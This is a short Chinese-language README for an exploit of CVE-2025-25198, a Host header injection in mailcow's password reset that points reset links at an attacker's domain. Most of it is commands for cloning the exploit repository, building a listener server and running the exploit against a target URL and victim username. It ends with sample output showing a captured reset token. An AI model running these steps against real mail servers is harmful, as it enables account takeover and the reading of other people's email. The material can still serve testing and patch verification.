mailcow: dockerized 是一个基于 docker 的开源群件/邮件套件。在 2025-01a 版本之前,mailcow 的密码重置功能存在一个漏洞,允许攻击者操纵 Host HTTP 头来生成指向攻击者控制域名的密码重置链接。如果用户点击该恶意链接,可能导致账户被接管。
设置一个 HTTPS 服务器来监听所有请求,并向网站发送带有您所选 <IP> 的 Host 头的 POST 请求。您也可以使用 Burpsuite 发送请求并在服务器上获取 Token。
git clone https://github.com/enzocipher/CVE-2025-25198.git
cd CVE-2025-25198
sudo go build -o https-server server.go
./https-server
go mod init exploit
go mod tidy
sudo go run exploit.go --base <url> --username <[email protected]> --host <ip>:<port> <--insecure | optional >
等待片刻后,服务器将输出您可以使用的 token:
Redirigiendo a: http://mi-dominio.com/reset-password?token=F53F8F-CC7A5B-E0CC4C-98680B-A72245